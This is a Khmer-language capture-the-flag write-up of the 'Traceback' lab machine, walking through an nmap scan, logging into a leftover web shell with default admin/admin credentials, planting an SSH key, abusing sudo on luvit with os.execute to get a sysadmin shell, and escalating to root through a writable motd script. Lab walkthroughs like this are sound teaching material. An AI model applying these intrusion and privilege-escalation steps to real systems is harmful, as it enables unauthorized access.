Recon

ជាដំបូងខ្ញុំប្រើ Nmap ដើម្បីស្វែងរកផតដែលបានបើក និងសេវាកម្មដែលបានប្រើ

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

:~$ sudo nmap -sC -sV 10.10.10.181 
Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-21 13:29 +07
Nmap scan report for 10.10.10.181
Host is up (0.29s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
|   256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_  256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

ដូចដែលបានឃើញ គឺមានតែផតពីរប៉ុណ្នោះដែលបានបើកគឺផត ២២(ssh) និងផង ៨០(http)

OSINT

ក្រោយពីស្កេនរួចមកខ្ញុំក៏ចូលទៅកាន់អាស័យដ្ឋាន http://10.10.10.181:80 ហើយក៏បានឃើញដូចរូបដូចខាងក្រោម៖

ខ្ញុំចុច Ctrl+U ដើម្បីចូលមើលកូដខាងក្នុង ក៏ឃើញមាននូវព័ត៌មានមួយចំនួន៖

ខ្ញុំចាប់ផ្ដើមស្វែងរកឈ្មោះម្ចាស់គណនី Xh4H នៅក្នុង Google ហើយក៏បានរកឃើញនូវ Github របស់ម្ចាស់គណនី។
បន្ទាប់មកខ្ញុំបានចូលទៅមើលក្នុង Repositories នោះហើយក៏ឃើញមាន Repository មួយមានឈ្មោះថា Web-Shells

ខ្ញុំបានសាកល្បងចូលទៅតាមឈ្មោះរបស់ Shell រហូតដល់ឯកសារឈ្មោះថា smevk.php ដែលលោតចេញនៅផ្ទាំងបំពេញបែបបត់ចូល

លេខសំងាត់របស់វាគឺ admin/admin ខ្ញុំក៏បានចូលទៅក្នុង Web Server បានសម្រេច។

Get User

ដើម្បីបាន User Flag ជាដំបូងខ្ញុំបានចូលទៅក្នុង /home/ តាមរយៈ Web-Shell ហើយក៏ឃើញមានគណនីអ្នកប្រើប្រាស់ចំនួនពីរ sysadmin/webadmin ដោយគណនី sysadmin ខ្ញុំមិនអាចមានសិទ្ធិចូលទៅក្នុងបានទេដូចនេះខ្ញុំចូលបានតែគណនី webadmin មួយប៉ុណ្នោះ។

ក្រោយមកខ្ញុំក៏ឃើញមានថតឯកសារមួយឈ្មោះថា .ssh និង ឯងសារមួយទៀតឈ្មោះថា authorised_keys

ដូចនេះខ្ញុំក៏បានបង្កើតនៅ SSH-Key ហើយដាក់វាចូលទៅក្នុងឯកសារនោះដើម្បីមានសិទ្ធិចូលទៅកាន់ម៉ាស៊ីនមេតាមរយៈ SSH

ក្រោយពីចូលតាមរយៈ SSH រួចមកខ្ញុំបានឃើញឯកសារមួយឈ្មោះ note.txt ដែលក្នុងនោះមានអត្ថន័យថា៖

1
2
3
4

- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.

ខ្ញុំក៏សាកស្វែងរកមើលឯកសារនៅក្នុងនោះ ហើយក៏បានរកឃើញប្រវត្តិប្រើប្រាស់ពាក្យបញ្ជាចាស់ៗ របស់អ្នកប្រើប្រាស់ដូចខាងក្រោម៖

1
2
3
4
5
6
7

webadmin@traceback:~$ cat .bash_history
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua 
rm privesc.lua
logout

ដោយដឹងថា luvit ជាប្រភេទ lua script ដែលមានលទ្ធិភាពក្នុងការ execute និងបើកមើលនូវរាល់ឯកសារណាដែលមាននៅក្នុងគណនី sysadmin បានដូចនេះខ្ញុំក៏បង្កើត Script តូចមួយដើម្បីចូលទៅបើកមើលឯកសារ user.txt ដែលមាននៅក្នុងគណនី sysadmin ផ្ទាល់តែម្ដង។

1

webadmin@traceback:~$ echo "os.execute("cat /home/sysadmin/user.txt") > user.lua

បន្ទាប់មកខ្ញុំបានប្រើប្រាស់ឯកសារ luvit ដដែលដើម្បីបើកឯកសារ user.lua

1
2

webadmin@traceback:~$ sudo -u sysadmin /home/sysadmin/luvit user.lua
23c296e8cxxxxxxxxxxxxxxxxxxxxxec

ដូចនេះខ្ញុំក៏ទទួលបាន User Flag ដូចដែលបានបង្ហាញខាងលើ។

Get Root

ដោយប្រើប្រាស់ឯកសារ luvit ខ្ញុំអាចមានសិទ្ធិចូលជាគណនីរបស់ sysadmin បានដោយប្រើប្រាស់វិធីដូចខាងក្រោម៖

1
2
3

webadmin@traceback:~$ echo "os.execute("/bin/bash") > sys.lua
webadmin@traceback:~$ sudo -u sysadmin /home/sysadmin/luvit sys.lua
sysadmin@traceback:~$

ដូចដែលបានឃើញគឺខ្ញុំមានសិទ្ធិប្ដូរទៅជាគណនី sysadmin វិញដោយប្រើប្រាស់ Lua Script

បន្ទាប់ពីមានសិទ្ធិជា sysadmin ហើយខ្ញុំក៏ដាក់ SSH-Key ចូលទៅក្នុងប្រអប់ .ssh ដើម្បីអាច SSH ចូលទៅក្នុងគណនី sysadmin បានដូចពីពេលមុនដែរ។

បន្តទៀតខ្ញុំត្រូវការមើល Process របស់គណនី root ថាតើកំពុងតែប្រើពាក្យបញ្ជាអ្វីខ្លះ។ ដោយសារតែមិនមានសិទ្ធិជា root ចឹងហើយទើបជម្រើសដែលល្អបំផុតគឺប្រើប្រាស់ Tool ខាងក្រៅហើយ Tool ដែលខ្ញុំប្រើនោះគឺឈ្មោះ pspy64 ដែលវាមានលទ្ធិភាពក្នុងការមើល Process គ្រប់គណនីទាំងអស់បើទោះបីជាគ្មានសិទ្ធិជា root ក៏ដោយ។

ទាញយក៖ pspy64

ដើម្បី Upload ឯកសារនេះបានខ្ញុំត្រូវប្រើប្រាស់ពាក្យបញ្ជា scp

1

:~$ sudo scp -i id_rsa pspy64 sysadmin@10.10.10.181:/tmp/

ខ្ញុំបានបើកដំណើរការឯកសារ pspy64 នោះ ហើយវាបានបញ្ចេញនូវព័ត៌មានដូចខាងក្រោម៖

1
2
3
4
5
6

2020/05/21 04:02:01 CMD: UID=0    PID=6094   | sleep 30 
2020/05/21 04:02:01 CMD: UID=0    PID=6093   | /bin/sh -c /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 
2020/05/21 04:02:01 CMD: UID=0    PID=6092   | /bin/sh -c sleep 30 ; /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/ 
2020/05/21 04:02:01 CMD: UID=0    PID=6091   | /usr/sbin/CRON -f 
2020/05/21 04:02:01 CMD: UID=0    PID=6090   | /usr/sbin/CRON -f 
2020/05/21 04:02:31 CMD: UID=0    PID=6096   | /bin/cp /var/backups/.update-motd.d/ /var/backups/.update-motd.d/10-help-text /var/backups/.update-motd.d/50-motd-news /var/backups/.update-motd.d/80-esm /var/backups/.update-motd.d/91-release-upgrade /etc/update-motd.d/

អ្វីដែលគួរឲ្យចាប់អារម្មណ៏នោះគឺត្រង់កន្លែង “/bin/sh -c /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/” និង “sleep 30” មានន័យថារាល់ពេល ៣០វិនាទីម្ដងម៉ាស៊ីនមួយនេះនឹងធ្វើការថតចម្លងគ្រប់ឯកសារទាំងអស់ដែលស្ថិតនៅក្នុងថតឯកសារ /var/backups/.update-motd.d/ យកទៅដាក់ចូលទៅក្នុងថតឯកសារ /etc/update-motd.d/ ដែលជាថតឯកសារមេរបស់ម៉ាស៊ីន និង ប្រើប្រាស់ដោយម្ចាស់គណនី root។

ក្រោយពីបានចូលទៅមើលឯកសារដែលមាននៅក្នុងថតឯកសារ /etc/update-motd.d/ រួចមកខ្ញុំសង្កេតឃើញថាឯកសារដែលមានក្នុងនោះគឺជារបស់ម្ចាស់គណនី root ប៉ុន្តែម្ចាស់គណនី sysadmin ក៏អាចមានសិទ្ធិកែប្រែបានផងដែរ។

ដូចនេះខ្ញុំក៏បន្ថែមពាក្យបញ្ជាមួយបន្ទាត់ទៀត គឺ “cat /root/root.txt” ចូលទៅក្នុងឯកសារ 00-header ដែលជាឯកសារបង្ហាញផ្ទាំងក្បាលនៅពេលចូលដល់កន្លែងវាយលេខសំងាត់របស់ SSH

នៅពេលរួចរាល់អស់ហើយខ្ញុំបានធ្វើការសាកល្បង SSH ចូលក្នុងម៉ាស៊ីនមេម្ដងទៀតហើយក៏ទទួលបាន… :D

ពិតណាស់ ដូចដែលឃើញចឹងគឺខ្ញុំទទួលបាន Root Flag នៅពេលដែលចូលក្នុងម៉ាស៊ីនមេដោយប្រើ SSH៕